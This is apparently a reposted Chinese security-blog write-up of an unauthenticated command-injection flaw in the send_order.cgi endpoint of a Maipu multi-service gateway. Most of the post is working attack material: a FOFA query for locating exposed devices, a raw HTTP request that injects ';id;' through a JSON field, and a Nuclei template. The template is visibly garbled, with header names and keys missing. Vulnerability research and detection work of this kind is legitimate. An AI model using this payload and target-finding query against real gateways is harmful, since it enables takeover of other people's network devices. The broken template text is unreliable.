迈普多业务融合网关是迈普通信技术股份有限公司自主研发的有线无线融合多业务网关,拥有有线无线网络一体配置、用户互联网网关、精准流控、上网行为管控、上网行为审计、网络安全防护、IPSec VPN分支互联、智能选路等强大功能,并支持对接迈普云平台,实现远程运维和集中管理。其接口send_order.cgi存在远程命令执行漏洞,未经身份验证的恶意攻击者可以任意命令,进而控制服务器系统。
二、网络测绘
fofa:title="迈普多业务融合网关"
三、漏洞复现
测试执行id命令
四、漏洞检测poc
POST /send_order.cgi?parameter=operation HTTP/1.1Host: 0.0.0.0Accept: */*Accept-Language: zh-CN,zh;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateContent-Length: 40{"opid":"1","name":";id;","type":"rest"}
五、Nuclei 检测POC
id: Maipu_send_order_cgi_RCEinfo:name: Maipu_send_order_cgi_RCEauthor: hamalseverity: highdescription: 迈普多业务融合网关send_order.cgi远程命令执行漏洞reference:https://tags: 微信公众号(实战安全研究)http:raw:|-POST /send_order.cgi?parameter=operation HTTP/1.1Host: {{Hostname}}Accept: */*: zh-CN,zh;q=0.9: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36: gzip, deflate: 40:"1","name":";id;","type":"rest"}: andmatchers:type: wordpart: bodywords:'"msg":"ok"'type: statusstatus:200
原文始发于微信公众号(实战安全研究):漏洞复现 | 迈普多业务融合网关send_order.cgi远程命令执行漏洞【附poc】
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论